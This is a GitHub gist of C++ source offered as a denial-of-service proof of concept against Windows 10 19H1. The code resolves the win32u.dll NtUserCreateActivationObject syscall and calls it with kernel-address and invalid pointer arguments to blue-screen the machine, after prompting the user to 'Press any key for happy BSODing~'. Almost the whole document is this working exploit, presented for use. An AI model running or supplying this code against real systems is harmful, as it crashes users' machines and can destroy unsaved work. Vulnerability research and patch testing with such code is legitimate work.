Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Win32k NtUserCreateActivationObject Denial Of Service (19H1)
#include <iostream>
#include <conio.h>
#include <Windows.h>
typedef LONG(WINAPI *pNtUserCreateActivationObject)(
HWND hwnd,
ULONG_PTR Irrelevant1,
LUID *Luid);
HCRYPTPROV g_hCryptoProvider = NULL;
pNtUserCreateActivationObject NtUserCreateActivationObject = NULL;
int main()
{
HMODULE hWin32u;
LoadLibrary(TEXT("user32.dll"));
//if (!CryptAcquireContext(&g_hCryptoProvider, NULL,
// MS_DEF_PROV, PROV_RSA_FULL, CRYPT_VERIFYCONTEXT))
//{
// printf("CryptAcquireContext failed with %u", GetLastError());
// return 0;
//}
printf("Loading win32u\r\n");
hWin32u = LoadLibraryEx(TEXT("win32u.dll"), NULL, LOAD_LIBRARY_SEARCH_SYSTEM32);
if (hWin32u) {
printf("win32u loaded\r\n");
NtUserCreateActivationObject = (pNtUserCreateActivationObject)
GetProcAddress(hWin32u, "NtUserCreateActivationObject");
if (NtUserCreateActivationObject == NULL) {
printf("Service NtUserCreateActivationObject not found\r\n");
}
else {
printf("Press any key for happy BSODing~\r\n");
_getch();
NtUserCreateActivationObject(
(HWND)0xffff800000000000,
(ULONG_PTR)0xffff800000000001,
(LUID*)0x00007ffffffffffe);
}
}
else {
printf("Loading win32u failed\r\n");
}
//CryptReleaseContext(g_hCryptoProvider, 0);
system("pause");
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.